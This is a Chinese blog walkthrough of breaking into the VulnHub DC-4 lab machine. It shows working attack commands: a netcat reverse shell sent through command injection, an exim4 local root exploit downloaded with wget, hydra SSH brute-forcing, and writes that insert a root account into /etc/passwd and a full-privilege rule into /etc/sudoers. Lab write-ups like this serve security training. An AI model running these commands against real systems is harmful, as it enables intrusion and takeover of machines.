Vulnhub_DC-4靶机渗透测试

最新推荐文章于 2024-07-31 00:00:00 发布
最新推荐文章于 2024-07-31 00:00:00 发布
阅读量126 收藏
点赞数 1
分类专栏: Vulnhub渗透测试靶场 文章标签: 网络 linux 网络安全 web安全 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66225311/article/details/133072639
版权

DC-4

DC: 4 ~ VulnHub

文章目录

信息收集

  1. 使用nmap扫描出靶机所处192.168.78.153网段 再扫描一下细致的内容,发现开放80网站和22 ssh端口。感觉多半要获取用户名和密码来进行ssh连接了

image-20230621210512417

web渗透

  1. 访问网站,是一个登录窗,根据标题给出admin提示,感觉用户名就是admin了,查看了一圈没有什么提示,看来多半要爆破密码了

image-20230621220952680

  1. 由web 1靶机给出的经验,再使用dirb扫描一下,很好,直接进行爆破
image-20230621221118833
  1. 输入参数提交抓包,发送到攻击模块,加载弱密码文件,进行爆破,得出密码为happy
image-20230621221213234
  1. 登录之后,发现有几个功能,执行了之后发现都是Linux系统命令,没有能输入命令的地方,灵机一动抓包会不会显示命令执行语句呢
image-20230621221334273

漏洞利用

  1. 正如所料,还真能抓包查看到执行命令,那就开始修改命令查看是否可行 传入id发现成功返回 出现了rce命令执行漏洞

image-20230621221428298

  1. 既然能直接执行系统命令,那就直接使用 nc 将当前web用户的shell反弹到虚拟机上,输入nc -e /binbash 192.168.78.145 7777

image-20230621221608398

image-20230621221623857

  1. 当然第一反应也想到写入一个木马文件,但尝试发现失败了,在kali里面尝试写入,发现参数没有了。在burp写入连文件都没有创建,可能权限不够吧

image-20230621221745449

image-20230621221750143

漏洞利用 获取shell

  1. 将反弹的shell转换成交互式shell python -c 'import pty; pty.spawn("/bin/bash")'
  2. 先来到home文件下,查看有没有什么文件可以查看

image-20230621221919392

  1. 查看一下etc/passwd,发现一共有三个用户为1000以上的,看来少不了ssh切换用户了

image-20230622162133655

  1. 查看了一圈文件发现jim文件夹内有一个备份的密码

image-20230621222102998

提升权限 1

  1. 使用find命令查找suid提权find / -user root -perm -4000 -print 2>/dev/null 发现了一个exim4,之前有用过这个提权,查看一下版本为

image-20230622161822835

  1. 查看版本为4.89,似乎正好可以进行本地提权的漏洞版本之间的

image-20230622162159874

  1. searchsploit exim查找可利用的提权POC 找到目标

image-20230622162344092

  1. 将脚本保存到桌面 cp /usr/share/exploitdb/exploits/linux/local/46996.sh 1.sh

image-20230622162719986

  1. 查看POC的文件尾格式,发现依旧是windows版本,修改成Linux版本

image-20230622162857945

  1. 将脚本文件导入到/var/www/html中,使用wget下载提权脚本到目标机中
启动阿帕奇服务  sudo service apache2 start
cp 1.sh /var/www/html/1.sh
chmod 777 1.sh
wget http://192.168.78.128/1.sh

image-20230622164555598

  1. 执行脚本提权查看

image-20230622164717019

  1. 查看flag文件

image-20230622164739386

权限提升2

  1. 既然已经有了密码文件,用户名肯定也就是home文件夹下的那几个了,使用hydra进行ssh爆破 hydra.exe -L user.txt -P DC-4pass.txt ssh://192.168.78.153 jim : jibril04

image-20230621222307273

image-20230621222301055

  1. 使用ssh登录到 jim用户

image-20230621222429432

  1. 查看了一圈没有什么可以查看的内容,也没有查找到其他用户的密码grep -rns charles ,查看wp发现了需要去查看/etc/mail 可以查看到 charles 用户发送给jim的密码

image-20230621222711580

  1. 据了解,jim用户有权利访问mbox文件,查看文件内容发现是一个邮件信息,所以转念去想/etc/mail邮件信息。而且mbox也是邮件信息的一种格式

image-20230622155002203

  1. 登录账户ssh charles@192.168.78.153 密码:^xHhA&hvim0y

image-20230621222753146

  1. 使用suid -l 查看当前用户具有的权限 发现可以不需要密码就能使用root权限去执行 /usr/bin/teehee

image-20230621223024678

  1. 查看teehee的使用方法,发现 -a参数可以将内容写入到一个文件中,而且不会覆盖,这就难免要想到DC-9靶机可以写入/etc/passwd账号密码,也可以写入/etc/sudoers 另账号具有所有的root权限

image-20230622155114052

  1. 所以现在就进行将charles用户 提升为具有root权限 charles ALL=(ALL:ALL) ALL payloadecho "charles ALL=(ALL:ALL) ALL" | sudo teehee -a /etc/sudoers

image-20230622155542535

image-20230622161528121

  1. sudo -l 发现用户确实有了root权限。直接使用 sudo su来提升为root权限,输入密码即可

image-20230622161624689

  1. 获取flag

image-20230622161640490

总结

本次的DC-4靶机感觉难度挺简单,至少是第一次直接从靶机打到了提权部分,没看wp,因为exim4漏洞POC有使用过,直接提权上到root。在进行常规提权的时候查看了一下邮件信息的文件 找到了隐藏密码

  1. 暴力破解登录网站
  2. shell命令执行直接反弹shell到kali上
  3. find 发现exim4提权POC suid提权
  4. wget 下载虚拟机网站的文件 无法上传文件到目标机上
  5. hydra对ssh登录爆破
  6. mbox邮件格式文件 /etc/mail 保存邮件信息
  7. 使用 --help查看teehee的用法
  8. 可以随意写入文件,可以尝试写入新账户root权限到/etc/passwd 可以将当前账号赋予所有的root权限 /etc/sudoers
echo 'hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0::/root:/bin/bash' >> /etc/passwd
echo "charles ALL=(ALL:ALL) ALL" | sudo teehee -a /etc/sudoers
``
生而逢时
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
VulnHub靶机 DC-9 靶机 详细渗透过程
rumil的博客
04-27 1455
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
VulnHub靶机 DC-5 打靶 渗透测试详细过程
rumil的博客
04-18 1045
在访问/footer.php,/thankyou.php时发现跳转界面和原始界面的年份不一样,总是来回变动,刷新也会变动。目录爆破发现,存在file参数,尝试读取一下/etc/passwd文件,成功读取/etc/passwd文件并回显成功。当然既然知道了包含/footer.php文件,那么我们也可以去猜解参数,常用的如file,尝试一下即可,或者爆破。暴露出如下几个目录,去访问发现其中的目录,爆出的目录其中有一些界面为默认界面当中点击跳转的目录。给予sh文件执行权限,直接执行一下试试,成功提权。
[Vulnhub] DC-1靶机渗透
weixin_45605352的博客
08-03 222
0x00 环境搭建 靶机地址:https://www.vulnhub.com/entry/dc-1,292/ 下载之后用vmware打开即可,使用桥接模式。 开机后搭建完成: 0x01 主机端口探测 用arp-scan -l 探测内网存活主机,再用nmap -sV -p- ip来探测端口: 发现开启了22端口(SSH服务)、80端口(HTTP服务)、111端口和57345端口(RPC服务) 0x02 web渗透 访问80端口 ...
vulnhub DC-5 靶机 渗透测试
小松博客
05-23 253
我们把这个文件复制出来 /usr/share/exploitdb/exploits/linux/local/41154.sh。进入shell模式,输入命令find / -perm /4000 2>/dev/null,查找具有SUID权限的命令。发现这下面的时间是在变的,每次刷新都不一样,这里和footer.php的php是一样的,所以我们推测是文件包含漏洞。注意,请不要在kali里面编译,亲测编译后的程序在靶机运行会报错,我是在Centos中编译的。发现一个footer.php,发现每次访问都不一样。
DC-4靶机渗透测试详细教程
啊醒的博客
05-04 3857
DC-4靶机渗透测试详细教程
VulnHub靶机 DC-7 打靶 渗透详细流程
rumil的博客
04-22 942
主机发现—端口扫描—目录爆破发现后台—服务探测—白盒测试(源码当中找配置文件)—ssh远程登录—邮件信息—找到备份文件脚本—发现脚本当中的drush命令—修改后台密码—进入后台—寻找可代码执行或getshell地方—drupal8不允许执行命令(模块)—下载新的插件—getshell—反弹shell—追加反弹命令—提权即可。由于我们上一步骤已经得到了backups.sh脚本属主为root,属组为www-data,所以我们将反弹shell命令添加到脚本当中,等待执行脚本反弹shell即可得到root权限。
VulnHub系列 DC-4靶机 渗透详细过程 | 红队打靶
rumil的博客
04-17 1191
通过test.sh脚本的提示信息,再加上查看发现的backups目录当中有密码信息,通过我们得到的三个用户名信息,再加上这个密码信息,可以尝试ssh爆破登录,观察是否可成功爆破出ssh用户的登录密码。回到后台,等登录即可,进入后台,发现有命令工具,进入查看,点击run,发现执行了ls -l命令得回显内容,抓包看一下。然后我们再次通过charles用户进行远程登录,成功登录,发现也有邮件,查看一下,并无有用的信息。去往此目录,查看jim文件得内容信息,发现charles发来的邮件,并有连接密码。
[Vulnhub] DC-9靶机渗透
weixin_45605352的博客
08-10 461
0x00 环境搭建 靶机地址:http://www.vulnhub.com/entry/dc-9,412/ 下载之后用vmware打开即可,使用桥接模式。 开机后搭建完成: 0x01 主机端口探测 用arp-scan -l探测内网存活主机,再用nmap -sV -p- ip来探测端口: 发现开启了80端口(HTTP服务),22端口存在过滤机制(SSH服务) 0x02 web渗透 访问80端口,没判断出是什么CMS: 目录扫描,发现登录入口: xray扫描出一个sql注入: 尝试注入: 丢到
vulnhub DC-3 靶机渗透测试
小松博客
05-21 169
我们使用账号admin,密码snoopy登陆到后台,再次回到msf中的利用脚本,输入run运行脚本。找到了不少漏洞可用,但就这个漏洞好使:CVE-2016-4557。得到一个漏洞利用脚本下载链接,我们把他down下来,然后解压。然后等待一下,输入ls查看目录内容,发现多了几个可执行文件。已经是root,直接cd到 /root目录,ls查看文件。拿到shell以后,我们上传漏洞检测脚本,寻找提权漏洞。等待几秒钟,然后输入whoami查看自己的权限。发现两个,可以尝试使用这个sql注入漏洞,
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Linux网络工具“瑞士军刀“集合
分享不一样的技术,与你一起共同成长!
07-26 368
下面结合之前的一些使用经验为大家介绍一下一些经典应用场景下,这个网络命令工具如何使用的。例如怎么查看当前服务器监听哪些端口、连接目标主机端口情况如何?平常我们在进行Linux服务器相关运维的时候,总会遇到一些网络相关的问题。我们可以借助这些小巧、功能强悍的工具帮助我们排查问题、解决问题...
计算机网络—电路、分组、报文交换—图文详解
最新发布
喻师傅的学习笔记
07-31 405
计算机网络—三种交换方式图文详解
linux操作系统_TCP
hkhkhkhkh123的博客
07-30 685
1)三次握手和四次挥手机制 2) 确认应答:TCP将每个字节的数据都进行了编号,即为序列号。每一个ACK都带有对应的确认序列号,保证数据不丢失的按序到达 3)超时重传:当发送端发送的数据在网络中丢失时,在一定时间内没有收到接收端的ACK,则发送端会重新发送丢失数据。2. ACK: 确认应答标志 3. PSH: 表示发送数据,提示接收端从TCP接收缓冲区中读走数据,为接收后续数据腾出空间 4. RST: 重置连接标志 5. SYN: 表示请求建立一个连接 6. FIN: finish标志, 表示释放连接。
S5730举例
jjjxxxhhh123的博客
07-27 970
例子: 假设在校园网络中,某些交换机之间存在多个连接(可能是多个光纤),如果没有STP,这些多个连接可能导致数据包在网络中无限制地传输,形成网络风暴,导致整个网络瘫痪。PIM-SM通过仅在需要时在网络中传输组播数据包,减少网络带宽的占用,提高数据传输效率。[sysname-GigabitEthernet0/0/1] ospf cost 10 // 设置接口的OSPF成本,影响路径选择。综上所述,这些网络技术和配置在大学校园网络中起到关键作用,确保网络运行高效、安全和可靠,同时满足用户的多样化需求。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值